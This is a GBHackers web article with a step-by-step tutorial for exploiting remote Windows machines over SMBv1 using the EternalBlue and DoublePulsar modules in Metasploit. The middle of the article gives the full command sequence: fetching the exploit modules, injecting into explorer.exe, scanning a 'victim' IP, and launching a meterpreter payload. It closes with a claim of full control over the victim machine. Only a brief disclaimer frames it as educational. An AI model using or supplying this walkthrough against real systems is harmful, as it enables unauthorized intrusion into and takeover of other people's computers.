Monday, May 5, 2025
HomeExploitation ToolsExploit Windows Remote PC with EternalBlue & DoublePulsar Exploit through Metasploit

Exploit Windows Remote PC with EternalBlue & DoublePulsar Exploit through Metasploit

Published on

SIEM as a Service

Follow Us on Google News

EternalBlue Malware was Developed by National Security Agency (NSA) exploiting Windows-based Server Message Block (SMBv1) it is believed the tool has released by Shadow Brokers Hackers Group in April 2017 and it has been used for Wannacry Cyber Attacks.

SMB version 1 (SMBv1) in various versions of Microsoft Windows accepts specially crafted packets from remote attackers, which is the reason this vulnerability existed with windows os which leads to performing Remote Code Execution which was particularly targeted in Windows 7 and XP.

The NSA Tool Called DOUBLEPULSAR which is designed to provide covert, backdoor access to a Windows system, has been immediately received by Attackers.

- Advertisement - Google News

Also Read Still More than 50,000 hosts are vulnerable to ETERNAL BLUE Exploit

Once installed, DOUBLEPULSAR  waits for certain types of data to be sent over port 445. When DOUBLEPULSAR  arrives, the implant provides a distinctive response.

EternalBlue Live Demonstration using Metasploit

We need to download and add the Scanner and exploit to Metasploit. Open your Terminal windows and Type the following commands.

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

EternalBlue

Move file smb_ms17_010.rb under the folder use/share/metasploit-framework/modules/auxiliary/scanner/smb

EternalBlue

And then you should copy Eternal Blue-Doublepulsar.rb and debs to under use/share/metasploit-framework/modules/exploits/windows/smb

EternalBlue

Now Open the Eternal Blue-Doublepulsar.rb with any Editor and change the path directory for ETERNALBLUE and DOUBLEPULSAR to smb exploit directory use/share/metasploit-framework/modules/exploits/windows/smb.

Also Read  NSA Malware “EternalBlue” Successfully Exploit and Port into Microsoft Windows 10

Then we should specify the name of the process to be injected, we have specified here as explorer.exe

EternalBlue

Then you should launch msfconsole and use the auxiliary scan module  smb_ms17_010.rb.

> use auxiliary/scanner/smb/smb_ms17_010
> show options

EternalBlue

Now you should set up RHOSTS IP which is the Victims Ip address.

> set RHOSTS IP
> run

EternalBlue

It will go and check whether the host is vulnerable or not and also display the victim’s machine details.

Now we can move to the exploit EternalBlue & Double Pulsar                                             > use exploit/windows/smb/eternalblue_doublepulsar
> set payload windows.x64/meterpreter/bind_tcp

> show options

EternalBlue

Then set a target architecture and then RHOST Victim IP address.

> setRHOST IP
> set targetarchitecture x64
> show options

EternalBlue
EternalBlue

And then type exploit and hit enter.

EternalBlue

It’s done now we have got the meterpreter session and the vulnerability has been exploited.

EternalBlue

Now the system has been exploited successfully and we have full control over the victim machine now.

You can follow us on LinkedinTwitter, and Facebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep yourself self-updated.

Disclaimer

This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and www.gbhackers.com  will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

Gunra Ransomware’s Double‑Extortion Playbook and Global Impact

Gunra Ransomware, has surfaced as a formidable threat in April 2025, targeting Windows systems...

Hackers Exploit 21 Apps to Take Full Control of E-Commerce Servers

Cybersecurity firm Sansec has uncovered a sophisticated supply chain attack that has compromised 21...

Hackers Target HR Departments With Fake Resumes to Spread More_eggs Malware

The financially motivated threat group Venom Spider, also tracked as TA4557, has shifted its...

RomCom RAT Targets UK Organizations Through Compromised Customer Feedback Portals

The Russian-based threat group RomCom, also known as Storm-0978, Tropical Scorpius, and Void Rabisu,...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Cable: Powerful Post-Exploitation Toolkit for Active Directory Attacks

Cybersecurity researchers are raising alarms about Cable, a potent open-source post-exploitation toolkit designed to exploit...

Windows 11 BitLocker Bypassed to Extract Encryption Keys

An attacker with physical access can abruptly restart the device and dump RAM, as...

ConvoC2 – A Red Teamers Tool To Execute Commands on Hacked Hosts Via Microsoft Teams

A stealthy Command-and-Control (C2) infrastructure Red Team tool named ConvoC2 showcases how cyber attackers...